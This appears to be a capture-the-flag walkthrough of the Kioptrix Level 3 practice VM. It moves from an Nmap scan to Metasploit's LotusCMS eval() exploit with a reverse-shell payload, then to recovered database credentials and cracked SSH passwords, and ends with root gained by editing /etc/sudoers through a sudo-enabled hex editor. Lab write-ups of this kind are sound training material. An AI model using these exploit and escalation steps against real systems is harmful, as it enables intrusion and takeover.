With the VM there is a README.txt file that says you should update your hosts file with the VM’s IP and hostname, which is kioptrix3.com. I initially ignored it and on the gallery page, all I could see were some broken images and links that didn’t work. I went back and added the entry to my /etc/hosts file, and everything worked fine afterwards.
Start by checking out what’s being exposed with Nmap:
nmap -A -p1-65535 192.168.127.128
Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-20 23:56 EEST
Nmap scan report for 192.168.127.128
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:07:4F:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s take a look at what’s hosted on the web server. It appears to be a site with a blog page, a gallery and what appears to be an admin login page:
I tried running a sqlmap scan against it, with no success. Next, I thought maybe there might be something about the LotusCMS that powers up the site. It turns out there’s a remote execution exploit available in Metasploit:
LotusCMS 3.0 eval() Remote Command Execution
This module exploits a vulnerability found in Lotus CMS 3.0’s Router() function. This is done by embedding PHP code in the ‘page’ parameter,
which will be passed to a eval call, therefore allowing remote code execution. The module can either automatically pick up a ‘page’ parameter
from the default page, or manually specify one in the URI option. To use the automatic method, please supply the URI with just a directory path,
for example: “/lcms/”. To manually configure one, you may do: “/lcms/somepath/index.php?page=index”
msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
URI /lcms/ yes URI
VHOST no HTTP server virtual host
0 Automatic LotusCMS 3.0
msf exploit(lcms_php_exec) > set RHOST 192.168.127.128
RHOST => 192.168.127.128
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit
[*] Started reverse handler on 192.168.127.159:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.128:40623) at 2014-06-22 00:37:23 +0300
So we have a shell. I could not find a local privilege escalation exploit right away, so I instead started exploring the system.
So, there’s all the source code for the gallery. I checked the files that looked interesting until I came upon a hit on the gconfig.php file, which contains the sort of information we need:
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
I tried SSHing to the box with these credentials and also elevating privileges with su, but that would have been too easy. So more digging in the Php source code. The gfunctions.php file contains a plethora of information, among which there are some table and column names. There might be more information in the Php files but I didn’t have the patience to go through all of them.
Back at the gallery, we can see some sorting options:
Changing the sort filter to photo id makes the URL look like this:
It was a bit overkill to dump so much information, but I only show here the important bits. To crack the hashes, I used the http://www.hashkiller.co.uk/ site:
dreg’s password: Mast3r
loneferret’s password: starwars
Thankfully, these credentials work for SSH login, so I could get rid of the Metasploit shell which kept throwing EOF errors if I didn’t interact with it for a while.
The authenticity of host 'kioptrix3.com (192.168.127.128)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com' (RSA) to the list of known hosts.
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
To access official Ubuntu documentation, please visit:
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
In the home directory there’s a CompanyPolicy.README file with the following:
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
Looks like a SUID binary! And it seems it’s a hex editor that we can use to view and edit any file on the system!
Ok, I could crack the root password, but there’s an easier way, by modifing the /etc/sudoers file. First, I had to look up some information about the ht editor. You need to use the F (function) keys for this one. With F6, I could change the mode to text, making it look less horrible. The easiest way I found to go about it was to open the /etc/sudoers file again, after selecting the text mode. Then I added /bin/bas to loneferret’s entry:
Now save the file and type sudo bash to get the long waited for root shell. In the /root/ directory there’s also a Congrats.txt file:
root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
Gallarific 2.1 - Free Version released October 10, 2009
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
The HT Editor can be found here:
And the vulnerable version on Exploit-DB here:
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
And this was Kioptrix level 3, with another interesting twist.
Today is the tomorrow you worried about yesterday.